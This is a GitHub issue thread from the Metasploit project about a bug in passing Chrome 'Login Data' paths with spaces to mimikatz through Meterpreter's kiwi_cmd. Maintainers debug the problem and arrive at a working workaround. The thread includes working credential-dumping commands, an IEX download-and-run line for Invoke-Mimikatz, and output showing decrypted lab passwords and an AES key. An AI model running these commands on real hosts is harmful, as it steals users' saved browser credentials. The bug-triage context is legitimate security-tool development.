### ISSUE TITLE
Problem with handling spaces in the file path in Kiwi_cmd/me

### ISSUE THREAD

**Issue by ForDockerImage** [rapid7/metasploit-framework#15622] opened 2021-08-30 18:49 UTC
Hi,
please, help to solve the problem with  work of mimikatz in meterpreter session:

I use:
Framework Version: 6.1.2-dev-

When i try to use mimikatz / kiwi from meterpreter session:
`kiwi_cmd "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""`

I get an error of mimikatz cannot find the database file "Login Data", **because it processes the file path up to the first space**.
```
`ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:"%localappdata%\Google\Chrome\User Data\Default\Login Data")

mimikatz(powershell) # %localappdata%\Google\Chrome\User
ERROR mimikatz_doLocal ; "C:\Users\Tester\AppData\Local\Google\Chrome\User" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)


            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # Data\Default\Login
ERROR mimikatz_doLocal ; "Data\Default\Login" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # Data
ERROR mimikatz_doLocal ; "Data" command of "standard" module not found !

          Module :        standard
          Full name :     Standard module
          Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname`
```
ps: maybe I'm stupid and can't just use it ;)

**Comment by adfoster-r7** [comment] 2021-08-31 00:59
I haven't verified this, but it might be related to https://github.com/rapid7/metasploit-framework/issues/14136 and https://github.com/rapid7/metasploit-framework/pull/14802. Potentially the previous fix would need to be extended to use https://ruby-doc.org/stdlib-2.5.1/libdoc/shellwords/rdoc/Shellwords.html#method-c-escape

cc @dwelch-r7

**Comment by ForDockerImage** [comment] 2021-08-31 16:37
Does not work for me:
`
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\\ Data\\Default\\Login\\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\ Data\\Default\\Login\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:"%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data" /unprotect"
kiwi_cmd "dpapi::chrome /in:'%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data' /unprotect"`
`
and 
`
cmd = "dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect"
cmd = Shellwords.escape(cmd)
run_single(cmd)
`

**Comment by adfoster-r7** [comment] 2021-09-02 00:32
It looks like there's a few separate problems. Firstly `%localappdata%` won't be expanded by msfconsole, so you'll need to provide an absolute path within msfconsole yourself. Additionally there's quoting issues behind the scenes too.

For context - I opened up `irb` to enter into an interactive shell where I interacted with the meterpreter kiwi extension directly:
```
>> puts kiwi.exec_cmd(' "dpapi::chrome /in:\"C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\""')
ERROR mimikatz_doLocal ; "C:\Windows\System32\spoolsv.exe" command of "standard" module not found !

Module :	standard
Full name :	Standard module
Description :	Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(powershell) # dpapi::chrome /in:"C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data"
ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d)

URL     : http://192.168.123.6/Authentication Required ( http://192.168.123.6/ )
Username: helloworld
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
=> nil
```

I wasn't able to get `/unprotect` to work as expected though, would have to debug further. The parsing itself is implemented in kiwi itself, so I'm not sure what's going wrong just yet.

Meterpreter callsite:
https://github.com/rapid7/metasploit-payloads/blob/45e98c85a3dc2b55d8e907a87c0555a89e3a1aa3/c/meterpreter/source/extensions/kiwi/main.c#L47-L49

The 'powershell' function that Meterpreter calls off to:
https://github.com/gentilkiwi/mimikatz/blob/571fc8cc99bfe33d362dfb7598eccb23a6bd1caf/mimikatz/mimikatz.c#L240-L256

**Comment by ForDockerImage** [comment] 2021-09-03 21:33
> It looks like there's a few separate problems. Firstly `%localappdata%` won't be expanded by msfconsole, so you'll need to provide an absolute path within msfconsole yourself. Additionally there's quoting issues behind the scenes too.
> 
> For context - I opened up `irb` to enter into an interactive shell where I interacted with the meterpreter kiwi extension directly:
> 
> ```
> >> puts kiwi.exec_cmd(' "dpapi::chrome /in:\"C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\""')
> ERROR mimikatz_doLocal ; "C:\Windows\System32\spoolsv.exe" command of "standard" module not found !
> 
> Module :	standard
> Full name :	Standard module
> Description :	Basic commands (does not require module name)
> 
>             exit  -  Quit mimikatz
>              cls  -  Clear screen (doesn't work with redirections, like PsExec)
>           answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
>           coffee  -  Please, make me a coffee!
>            sleep  -  Sleep an amount of milliseconds
>              log  -  Log mimikatz input/output to file
>           base64  -  Switch file input/output base64
>          version  -  Display some version informations
>               cd  -  Change or display current directory
>        localtime  -  Displays system local date and time (OJ command)
>         hostname  -  Displays system local hostname
> 
> mimikatz(powershell) # dpapi::chrome /in:"C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data"
> ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d)
> 
> URL     : http://192.168.123.6/Authentication Required ( http://192.168.123.6/ )
> Username: helloworld
> ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
> => nil
> ```
> 
> I wasn't able to get `/unprotect` to work as expected though, would have to debug further. The parsing itself is implemented in kiwi, so I'm not sure what's going wrong just yet.
> 
> Meterpreter callsite:
> https://github.com/rapid7/metasploit-payloads/blob/45e98c85a3dc2b55d8e907a87c0555a89e3a1aa3/c/meterpreter/source/extensions/kiwi/main.c#L47-L49
> 
> The 'powershell' function that Meterpreter calls off to:
> https://github.com/gentilkiwi/mimikatz/blob/571fc8cc99bfe33d362dfb7598eccb23a6bd1caf/mimikatz/mimikatz.c#L240-L256

This is the bug of mimikatz, i tried the .ps1 version:
`IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""`

Got:
```
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
```

**Comment by adfoster-r7** [comment] 2021-09-03 23:44
@ForDockerImage That's what I was seeing too :+1:

**Comment by a-Hunter89** [comment] 2021-11-15 20:58
got the same problem is it fixed?

**Comment by aleksf** [comment] 2021-12-09 12:56
As a workaround, can you use short DOS path names? Seems to work just fine.

```
Invoke-Mimikatz -Command '"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect" "exit"'
```

**Comment by timwr** [comment] 2022-02-16 12:32
I can confirm the workaround works for older versions of Chrome:
```
meterpreter > kiwi_cmd 'dpapi::chrome /in:C:\Users\User\AppData\Local\Google\Chrome\USERDA~1\Default\LOGIND~1 /unprotect'
ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d)

URL     : http://natas0.natas.labs.overthewire.org/Authentication required ( http://natas0.natas.labs.overthewire.org/ )
Username: natas0
 * using CryptUnprotectData API
Password: natas0
```

However it looks like Chrome > 80 no longer uses the CryptUnprotectData API, so I get:
```
meterpreter > kiwi_cmd 'dpapi::chrome /in:C:\Users\User\AppData\Local\Google\Chrome\USERDA~1\Default\LOGIND~1 /unprotect'
ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d)

URL     : http://natas0.natas.labs.overthewire.org/Authentication required ( http://natas0.natas.labs.overthewire.org/ )
Username: natas0
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
```

So it looks like there are two bugs. One for handling spaces (for which there is a workaround), and another for `No Alg and/or Key handle despite AES encryption`, for which I'm not sure how to fix (yet).

**Comment by timwr** [comment] 2022-02-18 11:30
Quick update on this:
I've added a fix for enum_chrome, which is able to gather chrome > 80 passwords:
https://github.com/rapid7/metasploit-framework/pull/16200

I also have a fix for handling spaces. The dos shorthand workaround appears to be the cause of `No Alg and/or Key handle despite AES encryption` issue. I'll submit this shortly, it's unclear whether the fix best belongs in the metasploit-payloads or mimikatz repository.

**Comment by timwr** [comment] 2022-02-28 10:13
So there was a couple of bugs interacting badly to make even the dos shorthand workaround fail here.
Firstly the inability to use spaces in the /in: argument made it difficult to supply the correct Login Data path as an argument.
Secondly, the argument parser in mimikatz meant that it was difficult to supply commands with arguments, as sometimes the arguments were executed as commands.
Thirdly, the base64 mode prevented dpapi::chrome from opening the file containing the masterkey, e.g: `ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d)`

For 1 and 2, I have a fix for this but I will attempt to get it merged into the mimikatz repository.
For 3, you can simply turn base64 off before running the command (using the dos shorthand workaround), e.g:
```
meterpreter > kiwi_cmd 'base64 /in:off /out:off'
isBase64InterceptInput  is false
isBase64InterceptOutput is false

meterpreter > kiwi_cmd 'dpapi::chrome /in:%localappdata%\Google\Chrome\USERDA~1\Default\LOGIND~1 /unprotect'
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
> AES Key is: 3af0783c2f8e42489504f6e115a4dfdaf1b14030e5e54906e7d96f2f786e2242

URL     : http://natas0.natas.labs.overthewire.org/Authentication required ( http://natas0.natas.labs.overthewire.org/ )
Username: natas0
 * using CryptUnprotectData API
Password: natas0

URL     : http://natas1.natas.labs.overthewire.org/Authentication required ( http://natas1.natas.labs.overthewire.org/ )
Username: natas1
 * using BCrypt with AES-256-GCM
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto
```

**Closed** 2022-03-01 19:46 UTC
Labels: bug, confirmed
